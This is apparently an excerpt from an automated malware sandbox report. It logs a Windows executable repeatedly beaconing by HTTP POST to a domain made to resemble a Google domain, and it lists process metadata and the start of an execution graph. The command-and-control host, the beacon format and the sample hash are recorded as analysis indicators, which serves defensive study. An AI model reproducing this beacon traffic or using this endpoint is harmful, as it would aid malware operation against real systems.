              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:33.532941103 CET820INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:33 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=J0zLV93Z6IdKTwymqXzsMlHAo1drKi9yMXPib4TdRCsz6w%2FxlnMONAX2Sh%2FqtaKsItrgkn05I7mEe%2BJ1JOS12RBUjIaVI76%2F6OEIbxtBw8XiySTb6SLBIcpSZnGu9G015sx2xqE2jco6%2FY5f7L7LQOTVaqsIRQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9485189842d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1546&min_rtt=1546&rtt_var=773&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
              Data Ascii: 7 <c><d>
              Jan 8, 2025 08:47:33.664865971 CET5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              98192.168.2.550073104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:35.295711040 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:35.924393892 CET819INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:35 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yshjAfgPmfBp87iJVsP8rkd%2Fl46sBBEYAbKW7VaPSYqmCslSHKVxPI%2FxK4CqQOAg4eWmvSw6ZH5OuN2gwnuSzz36Gpcd%2Bi7QXX9y8D9z4s%2FacZQJEHT%2BvR3PH3yMk8FmHk0E6UqY3buGtC2hosydQ5OUiqbDPA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94941dff8c0f-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1948&min_rtt=1948&rtt_var=974&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=221&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              99192.168.2.550074104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:37.436069012 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:38.069399118 CET828INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:38 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M%2FL%2BM%2BB4MalFQWbUH6HHcWTUl9pxhvx%2FWsQUi6Ogb7ZFVj4mTJKQV%2FNI5LApPnMZaZs6rXJpVdVXfEPfJgzrcQp%2FZo0Bkq1LNywWygxWcWrOuWbOPD3upAUPjBr%2BtjKSsZNi1g9%2BDf%2FeeCxCvdlNwsD2RdYY2g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94a179630f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1460&min_rtt=1460&rtt_var=730&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a
              Data Ascii: 7 <c><d>
              Jan 8, 2025 08:47:38.199882030 CET5INData Raw: 30 0d 0a 0d 0a
              Data Ascii: 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              100192.168.2.550075104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:39.826623917 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:40.452537060 CET813INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:40 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R7NckOVddOjJIy7UNs34DMP4QR1o4zdipi35FSSmoWj5PXTP1Pk66Z8oG%2BPrBGO6TBj67mVntX4lz1JtczdRTVs61PXEpEOGD%2B5Rcx41j81AvEvCCNpG6bc8YttJVQsLQTCZ9Z8HgOLSKkb96jRVqF8a4ngYvw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94b0699642d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1573&min_rtt=1573&rtt_var=786&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              101192.168.2.550076104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:41.967251062 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:42.608059883 CET827INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:42 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mMs%2FcdYxKxEExJdsVvmzwKTvhrexwtLRjo3DsmHu4rDHjickCC7W5unnaWKYL1qGoSv5SwzrSuDlUw%2B%2FTLARsb3ZZ5ZqIwPhZcld3%2B%2Bum4EKXXuPfmMJpblj4zOeEdopF0ZaCwzGuuHEaPjJgTbdiy5i%2FKxWwA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94bdc9f0c443-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1591&min_rtt=1591&rtt_var=795&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              102192.168.2.550077104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:44.295206070 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:44.854605913 CET831INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:44 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PwU10P%2B%2B0r%2Fj9JUNaV%2F%2BcES1anVotmB%2BTHK%2B5inuiAVojVDUx9zMLHb9n9YI9Jt5lUpyxbg1TNWR6xPxTa4NY75l8lw%2BPijzWiVNHwjPIIl8B02E9C7DCCubPr393yeXA%2BWbgsFAApkOSrKb%2Bn242M%2FOuS8JKg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94cc69077d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1931&min_rtt=1931&rtt_var=965&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              103192.168.2.550078104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:46.376808882 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:47.007442951 CET827INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:46 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gLFIhhOHsvknjhDGs9qEJYYGGsR0F2oJ1owdGTa5%2F2ydhq8%2Bzn79OkGK87ehY%2FPCe4R5lo1hpP7N8cJW6NFSA%2B3NXZEHopNIZXlkxLWQ%2BiPYZYqbqfxTejCYRAjFVo%2BXBC804HV6C0jkQoqsbTfjpZlGoNyqhQ%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94d958a842d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1558&min_rtt=1558&rtt_var=779&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              104192.168.2.550079104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:48.748728991 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:49.371973038 CET815INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:49 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u1DSEjvsIyYxD1%2FapoHRaVnnx%2FxN6UcT2frrelV7VhWunHAcfCDcoX548UQr29oq8WDiUDYDNwpLi82lQxvK7%2ByJpujEhdrW49wlNoMxkSbPyT02CZhuHAgc4LN5YvROBXtj6J6eUpaBI5LeP6Uk6A8zsKsasg%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94e829f70f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1449&min_rtt=1449&rtt_var=724&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              105192.168.2.550080104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:50.890877008 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:51.539683104 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:51 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2F5MiEvWVvtR6BDYxQ8uAxelTR%2B0I4WGgjvPoAQawGMFBxZbv4gh9SbxztC9XXHwuHFa0VAZ66dVEv4AOKdztcdSFzSxeQrz19U9cL8fnK8H11qv0ABv6i1zt1SeR17ktt0VY6tH5BMgvFt0ep%2FCNURxCWIlazA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea94f5aa4842d2-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1554&min_rtt=1554&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              106192.168.2.550081104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:53.249902964 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:53.871049881 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:53 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Map50QzQZ2WfEw9uxBxmLWWcC%2BbGawYB83Cjvy%2FXFBLktXYA1wTtJVkXR0Wx%2BjkU5HB40sjgAVP4cdgXvMe23yfBHPAFeVi8lbbWCR%2BjXNF74YX08mlpCoQ5XE6dmJogVHAYmERp5howNLcHYeBA41lupFs8GA%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea95044c817d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1923&min_rtt=1923&rtt_var=961&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              107192.168.2.550082104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:55.391611099 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:47:56.047641039 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:56 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w1Nizr5UZ%2FArnR1xEhYVnLurbwghp9EnJxwzwVx586MCXOUpEtIlGIJOVhuLqz90Lyh1l64KR2ztHPGir50o19Zi%2BIYHxyKIsHs3sLFsjk1dnzXMifJCy9uAPLu%2FpSw0K5ihPz3UV70wCMEYWTUB5iUs1kif4w%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea9511cf5b0f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1472&min_rtt=1472&rtt_var=736&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              108192.168.2.550083104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:47:57.685775042 CET172OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 4
              Cache-Control: no-cache
              Data Raw: 73 74 3d 73
              Data Ascii: st=s
              Jan 8, 2025 08:47:58.309581041 CET817INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:47:58 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WnK4uQd4uqH1PFye64yfoVQ98PHEZ0UvfeHyTZMSXmgU2t4a3UXPnPYsE6QIu4BdLkmSPe0%2FvrU8F6YwMOyzb7ZsACnfU3hg11n1T1od7cX%2BtjrM%2FdPp6nGd5%2BIMHtqeJAMzg6gcnpH6YC6b2kUdNhCXFrAdZw%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea95200ea47d0e-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1925&min_rtt=1925&rtt_var=962&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=172&delivery_rate=0&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 1 0


              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              109192.168.2.550084104.21.80.1803868C:\Users\user\Desktop\6uHfmjGMfL.exe
              TimestampBytes transferredDirectionData
              Jan 8, 2025 08:48:00.920124054 CET326OUTPOST /api/index.php HTTP/1.1
              Content-Type: application/x-www-form-urlencoded
              Host: clientservices.sgoogleapis.observer
              Content-Length: 156
              Cache-Control: no-cache
              Data Raw: 72 3d 34 45 42 45 44 43 44 36 46 34 31 33 44 42 31 35 44 34 44 43 37 43 45 43 31 38 44 38 35 39 34 46 43 34 43 39 43 34 35 42 33 34 42 31 33 33 45 42 46 37 33 44 44 36 38 36 34 37 43 45 38 39 41 44 45 33 35 32 30 30 36 46 36 41 35 30 41 46 30 46 33 30 45 42 43 39 39 35 32 30 37 30 30 39 41 46 34 35 33 39 42 31 45 39 36 46 43 36 44 41 38 34 45 44 43 34 41 35 45 35 41 30 37 41 42 31 38 31 39 35 30 35 45 30 46 45 34 33 30 33 34 30 30 39 36 30 41 36 32 44 36 31 44 31
              Data Ascii: r=4EBEDCD6F413DB15D4DC7CEC18D8594FC4C9C45B34B133EBF73DD68647CE89ADE352006F6A50AF0F30EBC995207009AF4539B1E96FC6DA84EDC4A5E5A07AB1819505E0FE4303400960A62D61D1
              Jan 8, 2025 08:48:01.581615925 CET821INHTTP/1.1 200 OK
              Date: Wed, 08 Jan 2025 07:48:01 GMT
              Content-Type: text/html; charset=UTF-8
              Transfer-Encoding: chunked
              Connection: keep-alive
              cf-cache-status: DYNAMIC
              vary: accept-encoding
              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4myCkBM%2BDC3uW9mxcnZbsj3rzjWbr00olfqYjxTLnRAMgQeLLkUQPTtAR29EpBaeexueIKNkDDxVNBInaJzazhvk5ICj2QaToyiTfehRE62HwgZ7m%2F0nPAXkfjjHBWZBleuMmXi3RnT8z%2BpKin3CD2I2MBi21g%3D%3D"}],"group":"cf-nel","max_age":604800}
              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
              Server: cloudflare
              CF-RAY: 8fea95346bc90f36-EWR
              server-timing: cfL4;desc="?proto=TCP&rtt=1479&min_rtt=1479&rtt_var=739&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=326&delivery_rate=0&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
              Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
              Data Ascii: 7 <c><d>0


              Click to jump to process

              Click to jump to process

              Click to dive into process behavior distribution

              Target ID:0
              Start time:02:43:53
              Start date:08/01/2025
              Path:C:\Users\user\Desktop\6uHfmjGMfL.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\6uHfmjGMfL.exe"
              Imagebase:0xcb0000
              File size:444'928 bytes
              MD5 hash:89796A9B6072D2334DB09C8B41A64C57
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:false

              Reset < >

                Execution Graph

                Execution Coverage:4.9%
                Dynamic/Decrypted Code Coverage:0%
                Signature Coverage:39.6%
                Total number of Nodes:1268
                Total number of Limit Nodes:9
                execution_graph 31444 cd9f85 31445 cd9f91 __FrameHandler3::FrameUnwindToState 31444->31445 31470 cd9cab 31445->31470 31447 cd9f98 31448 cda0f1 31447->31448 31458 cd9fc2 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock std::locale::_Setgloballocale 31447->31458 31494 cda2f5 4 API calls 2 library calls 31448->31494 31450 cda0f8 31451 cda0fe 31450->31451 31495 cdddae 23 API calls std::locale::_Setgloballocale 31450->31495 31496 cddd72 23 API calls std::locale::_Setgloballocale 31451->31496 31454 cda106 31455 cd9fe1 31456 cda062 31478 ce416b 31456->31478 31458->31455 31458->31456 31493 cddd88 37 API calls 4 library calls 31458->31493 31460 cda068 31482 cd0c00 31460->31482 31471 cd9cb4 31470->31471 31497 cda4df IsProcessorFeaturePresent 31471->31497 31473 cd9cc0 31498 cdc5c9 10 API calls 2 library calls 31473->31498 31475 cd9cc5 31476 cd9cc9 31475->31476 31499 cdc5e8 7 API calls 2 library calls 31475->31499 31476->31447 31479 ce4174 31478->31479 